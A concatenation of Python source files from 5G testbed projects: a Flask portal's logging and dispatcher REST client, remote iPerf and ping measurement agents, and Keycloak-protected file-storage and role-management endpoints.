+ record.levelname \
+ self.RESET_SEQ
record.levelname = color_levelname
return logging.Formatter.format(self, record)
@unique
class Level(Enum):
DEBUG, INFO, WARNING, ERROR, CRITICAL = range(5)
@dataclass
class LogInfo:
Log: List[Tuple[str, str]] = None
Count: Dict[str, int] = None
def __init__(self, dictionary):
self.Log = dictionary["Log"]
self.Count = dictionary["Count"]
@staticmethod
def Empty():
return {
"Count": {"Debug": 0, "Info": 0, "Warning": 0, "Error": 0, "Critical": 0},
"Log": []
}
class Log:
CONSOLE_FORMAT = '%(asctime)s %(levelname)s: %(message)s'
FILE_FORMAT = '%(asctime)s - %(levelname)s - %(message)s'
# Rotating log files configuration
LOG_SIZE = 16777216
LOG_COUNT = 10
initialized = False
app: Flask = None
@classmethod
def Initialize(cls, app: Flask):
config = Config()
folder = config.Logging.Folder
if not exists(folder): makedirs(folder)
# Accept all messages on Flask logger, but display only up to the selected level
app.logger.setLevel(logging.DEBUG)
console_handler: logging.StreamHandler = app.logger.handlers[0]
console_handler.setLevel(config.Logging.AppLevel)
console_handler.setFormatter(ColoredFormatter(cls.CONSOLE_FORMAT))
# Attach new file handler
file_handler = RotatingFileHandler(
join(folder, 'Portal.log'), maxBytes=cls.LOG_SIZE, backupCount=cls.LOG_COUNT)
file_handler.setFormatter(logging.Formatter(cls.FILE_FORMAT))
file_handler.setLevel(config.Logging.LogLevel)
app.logger.addHandler(file_handler)
# Put console logger at the end (to avoid saving _colors_ to file)
app.logger.handlers.reverse()
cls.app = app
cls.initialized = True
@classmethod
def _dump(cls, level: str, msg: str):
if cls.initialized:
log = cls.app.logger
method = getattr(log, level.lower())
method(msg)
else:
print(f"[Log not initialized][{level}] {msg}")
@classmethod
def D(cls, msg):
cls._dump('DEBUG', msg)
@classmethod
def I(cls, msg):
cls._dump('INFO', msg)
@classmethod
def W(cls, msg):
cls._dump('WARNING', msg)
@classmethod
def E(cls, msg):
cls._dump('ERROR', msg)
@classmethod
def C(cls, msg):
cls._dump('CRITICAL', msg)
@staticmethod
def State(condition: bool) -> str:
return f'{"En" if condition else "Dis"}abled'
@classmethod
def Log(cls, level: Union[Level, str], msg: str):
if isinstance(level, str):
level = Level[level]
if level == Level.DEBUG: cls.D(msg)
if level == Level.INFO: cls.I(msg)
if level == Level.WARNING: cls.W(msg)
if level == Level.ERROR: cls.E(msg)
if level == Level.CRITICAL: cls.C(msg)
@classmethod
def GetTraceback(cls):
exc_type, exc_value, exc_traceback = sys.exc_info()
return traceback.format_exception(exc_type, exc_value, exc_traceback)
@classmethod
def Traceback(cls):
lines = cls.GetTraceback()
for line in lines:
Log.D(line)
```
#### File: migrations/versions/56345866eed9_record_vim_name_on_network_service.py
```python
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '56345866eed9'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('network_service', sa.Column('vim_name', sa.String(length=64), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('network_service', 'vim_name')
# ### end Alembic commands ###
```
#### File: 5genesis/Portal/portal.py
```python
from typing import Dict
from app import create_app, db
from app.models import User, Experiment, Execution, Action
from Helper import Config, Facility, Log
app = create_app()
config = Config()
@app.shell_context_processor
def make_shell_context() -> Dict:
return {'DB': db, 'User': User, 'Experiment': Experiment,
'Execution': Execution, 'Action': Action,
'Config': config, 'Facility': Facility}
```
#### File: Portal/REST/dispatcherApi.py
```python
import json
from typing import Dict, Tuple, Optional, List
from app.models import User, Experiment
from .restClient import RestClient, Payload
from base64 import b64encode
from Helper import Config, Log, LogInfo
from app import db
from datetime import datetime, timezone
from os.path import split
class VimInfo:
def __init__(self, data):
self.Name = data['name']
self.Type = data['type']
self.Location = data['location']
def __str__(self):
return f'{self.Name} ({self.Type} - {self.Location})'
class DispatcherApi(RestClient):
def __init__(self):
config = Config().Dispatcher
super().__init__(config.Host, config.Port, "", https=True, insecure=True)
self.tokenExpiry = config.TokenExpiry
@staticmethod
def basicAuthHeader(user: str, password: str) -> Dict:
encoded = b64encode(bytes(f'{user}:{password}'.encode('ascii')))
return {'Authorization': f'Basic {encoded.decode("ascii")}'}
@staticmethod
def bearerAuthHeader(token: str) -> Dict:
return {'Authorization': f'Bearer {token}'}
def Register(self, user: User) -> Tuple[str, bool]:
""" Returns (<message>, <success>). """
url = '/auth/register'
data = {
'username': user.username,
'email': user.email,
'password': <PASSWORD>
}
try:
response = self.HttpPost(url, body=data, payload=Payload.Form)
status = self.ResponseStatusCode(response)
if status in [400, 200]:
message = self.ResponseToJson(response)['result']
return message, (status == 200)
else:
raise Exception(f"Status {status} ({response.reason})")
except Exception as e:
return f"Exception while accessing authentication: {e}", False
def GetToken(self, user: User) -> Tuple[str, bool]:
"""
Return a tuple (str, bool). The string contains the token OR the
error message, the boolean indicates success.
"""
url = '/auth/get_token'
try:
response = self.HttpGet(url, extra_headers=self.basicAuthHeader(user.username, user.password_hash))
status = self.ResponseStatusCode(response)
if status in [400, 200]:
result = self.ResponseToJson(response)['result']
return result, (status == 200)
else:
raise Exception(f"Status {status} ({response.reason})")
except Exception as e:
message = f"Error while retrieving token: {e}"
Log.E(message)
return message, False
def RenewUserToken(self, user: User) -> Optional[str]:
"""Returns None if no error, an error message otherwise"""
token, success = self.GetToken(user)
user.token = token if success else None
user.tokenTimestamp = datetime.now(timezone.utc) if success else None
db.session.add(user)
db.session.commit()
return token if not success else None
def RenewUserTokenIfExpired(self, user) -> Optional[str]:
"""Returns None if no error, an error message otherwise"""
tokenTimestamp = user.tokenTimestamp if user.tokenTimestamp is not None else datetime.min
tokenTimestamp = tokenTimestamp.replace(tzinfo=timezone.utc)
timespan = datetime.now(timezone.utc) - tokenTimestamp
if timespan.total_seconds() >= self.tokenExpiry:
return self.RenewUserToken(user)
else:
return None
def RunCampaign(self, experimentId: int, user: User) -> Dict:
maybeError = self.RenewUserTokenIfExpired(user)
if maybeError is not None:
return {"ExecutionId": None, "Success": False, "Message": maybeError}
token = user.CurrentDispatcherToken
descriptor = json.dumps(Experiment.query.get(experimentId).serialization())
url = f'/elcm/api/v0/run'
response = self.HttpPost(url, {'Content-Type': 'application/json', **self.bearerAuthHeader(token)}, descriptor)
status = RestClient.ResponseStatusCode(response)
if status != 200:
return {"ExecutionId": None, "Success": False,
"Message": f"Execution request failed with status {status}"}
else:
response = RestClient.ResponseToJson(response)
response.update({"Success": True, "Message": "No error"})
return response
def GetExecutionLogs(self, executionId: int, user: User) -> Dict:
maybeError = self.RenewUserTokenIfExpired(user)
if maybeError is not None:
empty = LogInfo.Empty()
return {'PreRun': empty, 'Executor': empty, 'PostRun': empty, 'Status': maybeError}
token = user.CurrentDispatcherToken
url = f'/elcmexecution/{executionId}/logs'
response = self.HttpGet(url, extra_headers=self.bearerAuthHeader(token))
return RestClient.ResponseToJson(response)
def basicGet(self, user: User, url: str, kind: str) -> Tuple[object, Optional[str]]:
try:
maybeError = self.RenewUserTokenIfExpired(user)
if maybeError is not None:
return {}, maybeError
token = user.CurrentDispatcherToken
response = self.HttpGet(url, extra_headers=self.bearerAuthHeader(token))
return self.ResponseToJson(response), None
except Exception as e:
return {}, f"Exception while retrieving list of {kind}: {e}"
def GetVimLocations(self, user: User) -> Tuple[List[VimInfo], Optional[str]]:
data, error = self.basicGet(user, '/mano/vims', 'VIMs') # type: List, Optional[str]
return [VimInfo(vim) for vim in data] if error is None else [], error
def GetVimLocationImages(self, user: User, vim_name: str) -> Tuple[List[VimInfo], Optional[str]]:
data, error = self.basicGet(user, '/mano/image', f"images for VIM '{vim_name}'") # type: Dict, Optional[str]
return data.get(vim_name, []) if error is None else [], error
def GetAvailableVnfds(self, user: User) -> Tuple[List[str], Optional[str]]:
data, error = self.basicGet(user, '/mano/vnfd', f"VNFDs") # type: Dict, Optional[str]
return data if error is None else [], error
def GetAvailableNsds(self, user: User) -> Tuple[List[str], Optional[str]]:
data, error = self.basicGet(user, '/mano/nsd', f"NSDs") # type: Dict, Optional[str]
return data if error is None else [], error
def handleErrorcodes(self, code: int, data: Dict, overrides: Dict[int, str] = None) -> str:
defaults = {
400: "Invalid Input",
401: "Invalid permission",
404: "Not found",
406: "File not valid",
409: "Conflict",
413: "File too large",
422: "Unprocessable entity",
500: "Internal server error" # Or an unknown error code
}
overrides = {} if overrides is None else overrides
error = overrides.get(code, defaults.get(code, defaults[500]))
if code in [400, 404, 409, 422]:
extra = f" (Status: {data['status']}, Code: {data['code']}, Detail: {data['detail']})"
elif code == 401:
extra = ""
else:
extra = f" (Code {code})"
return error + extra
def OnboardVnfd(self, path: str, token: str, visibility: bool) -> Tuple[str, bool]:
"""Returns a pair of str (id or error message) and bool (success)"""
url = '/mano/vnfd'
overrides = {409: "Conflict - VNFD already present"}
return self._onboardVnfdOrNsd(url, path, token, 'VNFs', overrides, visibility)
def OnboardNsd(self, path: str, token: str, visibility: bool) -> Tuple[str, bool]:
"""Returns a pair of str (id or error message) and bool (success)"""
url = '/mano/nsd'
overrides = {409: "Conflict - NSD already present"}
return self._onboardVnfdOrNsd(url, path, token, "NSs", overrides, visibility)
def _onboardVnfdOrNsd(self, url: str, path: str, token: str, dictId: str, overrides: Dict, visibility: bool):
with open(path, "br") as file:
data = {'visibility': str(visibility).lower()}
response = self.HttpPost(url, extra_headers=self.bearerAuthHeader(token), files={'file': file},
body=data, payload=Payload.Form)
code = self.ResponseStatusCode(response)
data = self.ResponseToJson(response)
if code == 200:
try:
return list(data[dictId].keys())[0], True
except (KeyError, IndexError, AttributeError):
return split(path)[1], True
elif code == 400:
try:
return data['error'], False
except KeyError:
return str(data), False
else:
return self.handleErrorcodes(code, data, overrides), False
def OnboardVim(self, path: str, vimName: str, token: str, visibility: str) -> Optional[str]:
"""Returns an error message, or None on success"""
with open(path, "br") as file:
containerFormat = "bare"
data = {'vim_id': vimName, 'container_format': containerFormat,
'visibility': str(visibility).lower()}
response = self.HttpPost('/mano/image', extra_headers=self.bearerAuthHeader(token),
body=data, files={'file': file}, payload=Payload.Form)
code = self.ResponseStatusCode(response)
if 200 <= code <= 299:
return None
else:
try:
data = self.ResponseToJson(response)
return data.get('detail', data.get('result', f'Unknown error. Status code: {code}'))
except Exception as e:
raise Exception(f"Unknown exception '{e}'. Status code: {code}")
``` |
{
"source": "5genesis/Remote_iPerf_agent",
"score": 2
} |
#### File: 5genesis/Remote_iPerf_agent/app.py
```python
import os
import yaml
from flask import Flask, jsonify, request
from iperfExecutor import iPerf
from iperfExecutor.iperfConfig import iPerfConfig
app = Flask(__name__)
THIS_FOLDER = os.path.dirname(os.path.abspath(__file__))
with open(os.path.join(THIS_FOLDER, 'config.yml'), 'r', encoding='utf-8') as file:
data = yaml.safe_load(file)
iPerf.Initialize(data['IPERF_PATH'])
def errorResponse(message, error):
print(f'{message}: {error}')
return jsonify({'Status': 'Error', 'Message': message, 'Error': f'{error}'}), 403
@app.route('/Iperf', methods=['POST'])
@app.route('/Iperf/<pathParameters>', methods=['GET'])
def Iperf(pathParameters: str = ""):
mode = 'server'
try:
if request.method == 'POST':
jsonBody = str(request.json)
parameters = jsonBody[1:-1].replace('\'', '').split(',')
else:
if iPerfConfig.formatValidation(pathParameters):
parameters = pathParameters[1:-1].split(',')
else:
return errorResponse('Error executing iPerf', 'Wrong parameter format')
for param in parameters:
if '-c' in param:
mode = "client"
break
iPerf.Iperf(parameters)
return jsonify({'Status': 'Success', 'Message': f'Successfully executed iPerf {mode}'})
except Exception as error:
return errorResponse(f'Error executing iPerf {mode}', error)
@app.route('/Close', methods=['GET'])
def Close():
try:
iPerf.Close()
return jsonify({'Status': 'Success', 'Message': 'Successfully closed iPerf'})
except Exception as error:
return errorResponse('Error closing iPerf', error)
@app.route('/LastRawResult', methods=['GET'])
def LastRawResult():
try:
return jsonify({'Status': 'Success', 'Message': 'Successfully retrieved last raw result',
'Result': iPerf.LastRawResult()})
except Exception as error:
return errorResponse('Error retrieving last raw result', error)
@app.route('/LastJsonResult', methods=['GET'])
def LastJsonResult():
try:
return jsonify({'Status': 'Success', 'Message': 'Successfully retrieved last json result',
'Result': iPerf.LastJsonResult()})
except Exception as error:
return errorResponse('Error retrieving last json result', error)
@app.route('/LastError', methods=['GET'])
def LastError():
try:
return jsonify({'Status': 'Success', 'Message': 'Successfully retrieved last error',
'Error': iPerf.LastError()})
except Exception as error:
return errorResponse('Error retrieving last error', error)
@app.route('/StartDateTime', methods=['GET'])
def StartDateTime():
return jsonify({'Status': 'Success', 'Message': f'Start date time {iPerf.StartDateTime()}'})
@app.route('/IsRunning', methods=['GET'])
def IsRunning():
return jsonify({'Status': 'Success', 'Message': f'iPerf is running: {iPerf.IsRunning()}'})
if __name__ == '__main__':
app.run()
```
#### File: Remote_iPerf_agent/iperfExecutor/iperfExecutor.py
```python
import os
import signal
import subprocess
from typing import List, Dict
from datetime import datetime, timezone
from threading import Thread
from iperfExecutor.iperfConfig import iPerfConfig
class iPerf:
isRunning = False
executable: str = None
rawResult: List[str] = []
jsonResult: List[Dict] = []
error: List[str] = []
startTime: datetime = None
isServer = False
processPID: int = -1
@classmethod
def Initialize(cls, executable: str):
cls.executable = executable
@classmethod
def Iperf(cls, parameters: List[str]):
params = iPerfConfig.parseParameters(parameters)
return cls.execute(params)
@classmethod
def Close(cls):
if not cls.isRunning or cls.processPID == -1:
raise RuntimeError('iPerf is not running')
os.kill(cls.processPID, signal.SIGTERM)
cls.processPID = -1
cls.isRunning = False
return 1
@classmethod
def LastRawResult(cls):
if cls.isRunning:
raise RuntimeError("iPerf is still running")
print(f'Last Raw Result: {cls.rawResult}')
return cls.rawResult
@classmethod
def LastJsonResult(cls):
if cls.isRunning:
raise RuntimeError("iPerf is still running")
print(f'Last Json Result: {cls.jsonResult}')
return cls.jsonResult
@classmethod
def LastError(cls):
if cls.isRunning:
raise RuntimeError("iPerf is still running")
print(f'Last Error: {cls.error}')
return cls.error
@classmethod
def StartDateTime(cls):
print(f'Start Date Time: {cls.startTime}')
return cls.startTime
@classmethod
def IsRunning(cls):
print(f'Is Running: {cls.isRunning}')
return cls.isRunning
@classmethod
def execute(cls, parametersDict: Dict) -> None:
if cls.executable is None:
raise RuntimeError('Running iPerf without executable')
if cls.isRunning:
raise RuntimeError('iPerf already running')
# Shorten long parameters format
parametersDict = iPerfConfig.shortenParameters(parametersDict)
# Force format to Mbits/sec and interval to 1s if not present
parametersDict['-f'] = 'm'
if '-i' not in parametersDict.keys():
parametersDict['-i'] = '1'
interval = int(parametersDict['-i'])
if '-u' in parametersDict.keys() or '-U' in parametersDict.keys():
protocol = 'UDP'
else:
protocol = 'TCP'
if '-P' in parametersDict.keys():
# 'P' parameter must be after client host and port, move it to the last key
parallelCount = int(parametersDict.pop('-P'))
parametersDict['-P'] = str(parallelCount)
# Even if 'P' is set, iPerf will ignore it when < 2
parallelEnabled = (parallelCount > 1)
else:
parallelCount = 1
parallelEnabled = False
parameters = []
for key, value in parametersDict.items():
parameters.append(key)
if len(value) != 0:
parameters.append(value)
params = [cls.executable, *parameters]
print(f'Final CLI parameters: {params}')
print(f'Protocol: {protocol}; Parallel: {parallelEnabled} (Count: {parallelCount}); Interval: {interval}')
Thread(target=cls.async_task, args=(params, protocol, parallelEnabled, interval)).start()
return None
@classmethod
def stdout(cls, process: subprocess.Popen, protocol: str, parallelEnabled: bool, interval: int):
pipe = process.stdout
for line in iter(pipe.readline, b''):
try:
line = line.decode('utf-8').rstrip()
except Exception as e:
line = f'DECODING EXCEPTION: {e}'
if 'error' in line or 'failed' in line:
cls.error.append(line)
parse = iPerfConfig.parseIperfResult(line, protocol, parallelEnabled, cls.startTime, interval)
if parse:
cls.rawResult.append(line)
cls.jsonResult.append(parse)
@classmethod
def async_task(cls, params: List[str], protocol: str, parallelEnabled: bool, interval: int):
cls.isRunning = True
cls.rawResult = []
cls.jsonResult = []
cls.error = []
cls.startTime = datetime.now(timezone.utc)
try:
process = subprocess.Popen(params, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
cls.processPID = process.pid
if '-c' in params:
cls.isServer = False
print('Client running')
else:
cls.isServer = True
print('Server running')
cls.stdout(process, protocol, parallelEnabled, interval)
process.wait()
except Exception as e:
print(f'Error in process: {e}')
finally:
cls.isRunning = False
if not cls.isServer:
print('Client finished')
else:
print('Server finished')
``` |
{
"source": "5genesis/Remote_Ping_Agent",
"score": 2
} |
#### File: Remote_Ping_Agent/pingExecutor/pingExecutor.py
```python
import os
import re
import signal
import subprocess
import pingparsing
from textwrap import dedent
from typing import List, Dict, Optional
from datetime import datetime, timedelta, timezone
from threading import Thread
from pprint import pprint
class ping:
isRunning = False
jsonResult: Dict = {}
error: List[str] = []
startTime: datetime = None
processPID: Optional[int] = None
@classmethod
def Ping(cls, address: str, interval: float, size: int, ttl: int):
params = ['-i', str(interval), '-O']
if size > 0:
params.extend(['-s', str(size)])
if ttl > 0:
params.extend(['-t', str(ttl)])
params.append(address)
return cls.execute(params, interval)
@classmethod
def Close(cls):
if not cls.isRunning or cls.processPID is None:
raise RuntimeError('ping is not running')
os.kill(cls.processPID, signal.SIGTERM)
@classmethod
def LastJsonResult(cls):
if cls.isRunning:
raise RuntimeError("ping is still running")
print(f'Last Json Result: {cls.jsonResult}')
return cls.jsonResult
@classmethod
def StartDateTime(cls):
print(f'Start Date Time: {cls.startTime}')
return cls.startTime
@classmethod
def IsRunning(cls):
print(f'Is Running: {cls.isRunning}')
return cls.isRunning
@classmethod
def execute(cls, parameters: List[str], interval: float) -> None:
if cls.isRunning:
raise RuntimeError('ping already running')
params = ['ping', *parameters]
print(f'Final CLI paramenters: {params}')
Thread(target=cls.async_task, args=(params, interval)).start()
return None
@classmethod
def stdout(cls, process: subprocess.Popen, interval: float):
pipe = process.stdout
pingResult = []
lostPings = []
for line in iter(pipe.readline, b''):
try:
line = line.decode('utf-8').rstrip()
except Exception as e:
line = f'DECODING EXCEPTION: {e}'
print(line)
if 'error' in line or 'failed' in line:
cls.error.append(line)
result = re.search(r'no answer yet for icmp_seq=(\d+)', line)
if result:
lost_seq = int(result.group(1))
lostPings.append(lost_seq)
if line != '':
pingResult.append(line)
parser = pingparsing.PingParsing()
pingResult.extend([
"--- demo.com ping statistics ---",
"0 packets transmitted, 0 received, 0% packet loss, time 0ms",
"rtt min/avg/max/mdev = 0.0/0.0/0.0/0.0 ms",
])
stats = parser.parse(dedent("\n".join(pingResult)))
icmp_replies = stats.icmp_replies
for lost in lostPings:
icmp_replies.insert(lost-1, {'timestamp': None, 'icmp_seq': lost, 'ttl': 54, 'time': -1.0,
'duplicate': False})
for icmp in icmp_replies:
date = cls.startTime + timedelta(seconds=(icmp['icmp_seq']*interval))
icmp['timestamp'] = date.timestamp()
cls.jsonResult = {'total': len(icmp_replies), 'success': len(icmp_replies)-len(lostPings),
'icmp_replies': icmp_replies}
print("Final JSON results")
pprint(cls.jsonResult)
@classmethod
def async_task(cls, params: List[str], interval: float):
cls.isRunning = True
cls.error = []
cls.jsonResult = {}
cls.startTime = datetime.now(timezone.utc)
try:
process = subprocess.Popen(params, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
cls.processPID = process.pid
print('ping running')
cls.stdout(process, interval)
process.wait()
except Exception as e:
print(f'Error in process: {e}')
finally:
cls.isRunning = False
cls.processPID = None
print('ping finished')
``` |
{
"source": "5GEVE/5G-EVE-PORTAL-BACKEND-fs",
"score": 2
} |
#### File: blueprints/files_storage/fs_bp.py
```python
from flask import ( Blueprint, jsonify, request)
from flask import current_app, send_from_directory
import os, app, requests, json, sys
from app import db
from werkzeug.utils import secure_filename
from app.keycloak.decorators import token_required
from app.keycloak.keycloak_client import KeycloakClient
from app.files_manager.files_manager import *
from app.models.file_data import *
from app.models.file_to_site import *
from app.models.site_data import *
# BLUEPRINT CREATION
bp = Blueprint('auth', __name__, url_prefix='/portal/fs')
kc_client = KeycloakClient()
fs_manager = FilesManager()
# ROUTES DEFINITION
@bp.route('/', methods=['GET'])
@token_required
def get_files(token_data):
if "SiteManager" in token_data['roles']:
data, status = fs_manager.get_files_to_deploy(token_data)
return data, status
elif "VnfDeveloper" in token_data['roles']:
data, status = fs_manager.get_uploaded_files(token_data)
return data, status
else:
return jsonify({"details": "Unauthorized"}), 401
'''
Saves single file uploaded from request.form
- uses stream to read in by chunks
@url_params:
- filename: name of the file
@form_params:
- file: file to be uploaded
@NOTE: When using direct access to flask.request.stream you cannot access request.file or request.form first,
otherwise stream is already parsed and empty (internal bahaviour of wekzeug)
'''
@bp.route('/upload/#', methods=['POST'])
@token_required
def upload(token_data, filename=None):
if "VnfDeveloper" in token_data['roles']:
if "Content-Length" not in request.headers:
return jsonify({"details":"Content-Length not in headers"}), 400
if filename is None or filename == '':
return jsonify({"details":"Filename not provided"}), 400
data, status = fs_manager.upload_file(token_data, filename, request)
return data, status
else:
return jsonify({"details": "Unauthorized"}), 401
'''
Assignation of sites for a specific file
@url_params:
- filename: name of the file
@json_params:
- sites: sites where the specified file must be deployed
'''
@bp.route('/sites/#', methods=['POST'])
@token_required
def set_sites(token_data, filename=None):
if "VnfDeveloper" in token_data['roles']:
if not request.is_json:
return jsonify({"details": "No json provided"}), 400
try:
data = request.get_json()
except Exception as e:
return jsonify({"details": "Provided JSON not correctly formatted"}), 400
if "sites" not in data.keys():
return jsonify({"details":"No sites provided"}), 400
# Retrieve list of site managers for the specific sites
site_managers, status_code = kc_client.get_site_manager_users()
if status_code == requests.codes.ok:
sm_map = {}
for site in data['sites']:
sm_map[site] = []
for sm in site_managers:
if "attributes" in sm.keys():
if "managed_sites" in sm['attributes'].keys():
if site in sm['attributes']['managed_sites']:
sm_map[site].append(sm['email'])
# Store information about the site where the uploaded file must be deployed
data, status = fs_manager.set_uploaded_file_sites(token_data, filename, data['sites'], sm_map, request)
return data, status
else:
print('Error retrieving list of site managers', file=sys.stderr)
return jsonify({"details": site_managers}), status_code
else:
return jsonify({"details": "Unauthorized"}), 401
'''
Updates the status of an uploaded file
@url_params:
- filename: name of the file
@json_params:
- status: new status to be assigned
- site: site name at which the file will be deployed
'''
@bp.route('/status/#', methods=['POST'])
@token_required
def set_file_status(token_data, filename=None):
if not "SiteManager" in token_data['roles']:
return jsonify({"details": "Unauthorized"}), 401
if not request.is_json:
return jsonify({"details": "No json provided"}), 400
try:
data = request.get_json()
except Exception as e:
return jsonify({"details": "Provided JSON not correctly formatted"}), 400
if "status" not in data.keys() or "site" not in data.keys():
return jsonify({"details":"No sites provided"}), 400
if data['status'] not in ['PENDING', 'READY']:
return jsonify({"details":"Status not supported. Only PENDING or READY can be used."}), 400
data, status = fs_manager.set_file_status(token_data, filename, data['site'], data['status'])
return data, status
'''
Downloads a specific file
@url_params:
- filename: name of the file
'''
@bp.route('/download/#', methods=['GET'])
@token_required
def download(token_data, filename=None):
if filename is None or filename=='':
return jsonify({"details":"Filename not provided"}), 400
if "SiteManager" in token_data['roles']:
file_to_download = FileData.query.filter_by(filename=filename).first()
user_folder_name = "{}/".format(str(file_to_download.creator).split('@')[0])
elif "VnfDeveloper" in token_data['roles']:
user_folder_name = "{}/".format(str(token_data['email']).split('@')[0])
else:
return jsonify({"details": "Unauthorized"}), 401
folder_path = os.path.join(os.path.join(current_app.config['UPLOAD_FOLDER'], user_folder_name))
file_full_path = os.path.join(os.path.join(folder_path, filename))
if not os.path.exists(file_full_path):
return jsonify({"details":"File does not exist"}), 400
return send_from_directory(folder_path, filename)
'''
Method to remove a file. Only the owner of the file will completely remove the file
from the system.
@url_params:
- filename: name of the file
@json_params:
- site: site name at which the file will be deployed
'''
@bp.route('/delete/#', methods=['POST'])
@token_required
def delete(token_data, filename=None):
if filename is None or filename=='':
return jsonify({"details":"Filename not provided"}), 400
if not request.is_json:
return jsonify({"details": "No json provided"}), 400
try:
data = request.get_json()
except Exception as e:
return jsonify({"details": "Provided JSON not correctly formatted"}), 400
if "site" not in data.keys():
return jsonify({"details":"No site provided"}), 400
if "SiteManager" in token_data['roles']:
file_to_download = FileData.query.filter_by(filename=filename).first()
user_folder_name = "{}/".format(str(file_to_download.creator).split('@')[0])
elif "VnfDeveloper" in token_data['roles']:
user_folder_name = "{}/".format(str(token_data['email']).split('@')[0])
else:
return jsonify({"details": "Unauthorized"}), 401
folder_path = os.path.join(os.path.join(current_app.config['UPLOAD_FOLDER'], user_folder_name))
file_full_path = os.path.join(os.path.join(folder_path, filename))
if not os.path.exists(file_full_path):
return jsonify({"details":"File does not exist"}), 400
fs_manager.delete_file(file_full_path, filename, data['site'])
return jsonify({"details": "file {} correctly removed".format(filename)}), 200
'''
Retrieves all the available site facilities where to deploy VNFs
'''
@bp.route('/site-facilities', methods=['GET'])
@token_required
def get_site_facilities(token_data):
site_facilities = SiteData.query.all()
site_facilities_names = []
for site in site_facilities:
site_facilities_names.append(site.sitename)
return jsonify({"details": { "site_facilities": site_facilities_names}}), 200
``` |
{
"source": "5GEVE/5G-EVE-PORTAL-BACKEND-rbac",
"score": 2
} |
#### File: blueprints/extra/extra_bp.py
```python
from flask import ( Blueprint, jsonify, request )
from app import oidc, config
#from flask_jwt_extended import ( jwt_optional, get_jwt_identity )
from app.keycloak.keycloak_client import Keycloak
import requests, json, collections
from requests.auth import HTTPBasicAuth
# BLUEPRINT CREATION
bp = Blueprint('extra', __name__, url_prefix='/portal/rbac/extra')
# Keycloak adapter
kc_client = Keycloak()
# Bugzilla URL
BZ_URL = config['bz_url']
# ROUTES DEFINITION
"""
Retrieves available roles
"""
@bp.route('/realmroles', methods=['GET'])
def get_realm_roles():
status_code, msg = kc_client.get_available_roles()
return jsonify({"details": msg}), status_code
##########################
## Use cases management ##
##########################
@bp.route('/use-cases', methods=['GET'])
@oidc.accept_token(require_token=True)
def get_use_cases():
token = str(request.headers['authorization']).split(" ")[1]
status_code, msg = kc_client.token_to_user(token)
if status_code == requests.codes.ok:
status_code, msg = kc_client.get_user_attributes(msg['id'], "use_cases")
return jsonify({"details": msg}), status_code
@bp.route('/use-cases', methods=['POST'])
@oidc.accept_token(require_token=True)
def add_use_cases():
if not request.is_json:
return jsonify({"details": "No json provided"}), 400
data = request.get_json()
try:
if not data['use_cases']:
return jsonify({"details": "No use cases provided"}), 400
except Exception as e:
return jsonify({"details": "use_cases key not found at the provided JSON"}), 400
if not type(data['use_cases']) == list:
return jsonify({"details": "Use cases must be provided using a list of elements"}), 400
token = str(request.headers['authorization']).split(" ")[1]
status_code, msg = kc_client.token_to_user(token)
if status_code == requests.codes.ok:
status_code, msg = kc_client.add_user_attributes(msg['id'], "use_cases", data['use_cases'])
return jsonify({"details": msg}), status_code
@bp.route('/use-cases', methods=['DELETE'])
@oidc.accept_token(require_token=True)
def delete_use_cases():
if not request.is_json:
return jsonify({"details": "No json provided"}), 400
data = request.get_json()
if not data['use_cases']:
return jsonify({"details": "No use cases provided"}), 400
if not type(data['use_cases']) == list:
return jsonify({"details": "Use cases must be provided using a list of elements"}), 400
token = str(request.headers['authorization']).split(" ")[1]
status_code, msg = kc_client.token_to_user(token)
if status_code == requests.codes.ok:
status_code, msg = kc_client.delete_user_attributes(msg['id'], "use_cases", data['use_cases'])
return jsonify({"details": msg}), status_code
###################
## Managed sites ##
###################
@bp.route('/managed-sites', methods=['GET'])
@oidc.accept_token(require_token=True)
def get_managed_sites():
token = str(request.headers['authorization']).split(" ")[1]
status_code, msg = kc_client.token_to_user(token)
if status_code == requests.codes.ok:
if "SiteManager" in msg['roles']:
status_code, msg = kc_client.get_user_attributes(msg['id'], "managed_sites")
else:
msg = {"managed_sites": []}
status_code = 200
return jsonify({"details": msg}), status_code
@bp.route('/managed-sites', methods=['POST'])
@oidc.accept_token(require_token=True)
def add_managed_sites():
if not request.is_json:
return jsonify({"details": "No json provided"}), 400
data = request.get_json()
try:
if not data['managed_sites']:
return jsonify({"details": "No use cases provided"}), 400
except Exception as e:
return jsonify({"details": "managed_sites key not found at the provided JSON"}), 400
if not type(data['managed_sites']) == list:
return jsonify({"details": "Use cases must be provided using a list of elements"}), 400
token = str(request.headers['authorization']).split(" ")[1]
status_code, msg = kc_client.token_to_user(token)
if status_code == requests.codes.ok:
if "SiteManager" in msg['roles']:
status_code, msg = kc_client.add_user_attributes(msg['id'], "managed_sites", data['managed_sites'])
else:
msg = {"managed_sites": []}
status_code = 200
return jsonify({"details": msg}), status_code
@bp.route('/managed-sites', methods=['DELETE'])
@oidc.accept_token(require_token=True)
def delete_managed_sites():
if not request.is_json:
return jsonify({"details": "No json provided"}), 400
data = request.get_json()
if not 'managed_sites' in data.keys():
return jsonify({"details": "No use cases provided"}), 400
if not type(data['managed_sites']) == list:
return jsonify({"details": "Use cases must be provided using a list of elements"}), 400
token = str(request.headers['authorization']).split(" ")[1]
status_code, msg = kc_client.token_to_user(token)
if status_code == requests.codes.ok:
if "SiteManager" in msg['roles']:
status_code, msg = kc_client.delete_user_attributes(msg['id'], "managed_sites", data['managed_sites'])
else:
msg = {"managed_sites": []}
status_code = 200
return jsonify({"details": msg}), status_code
#### For testing purposes ####
@bp.route('/services', methods=['GET'])
@oidc.accept_token(require_token=True)
def services():
token = str(request.headers['authorization']).split(" ")[1]
status_code, msg = kc_client.token_to_user(token)
if status_code == requests.codes.ok:
if "5geve_admin" in msg['roles']:
services = [{'name':'Experiments'}, {'name': 'VNF Storage'}, {'name': 'Services Catalogue'}, {'name': 'Tickets'}]
elif "5geve_experimenter" in msg['roles']:
services = [{'name':'Experiments'}, {'name': 'Services Catalogue'}, {'name': 'Tickets'}]
elif "5geve_vnfdev" in msg['roles']:
services = [{'name': 'VNF Storage'}, {'name': 'Tickets'}]
else:
services = [{}]
return jsonify({'details': services}), status_code
return msg, status_code
``` |
{
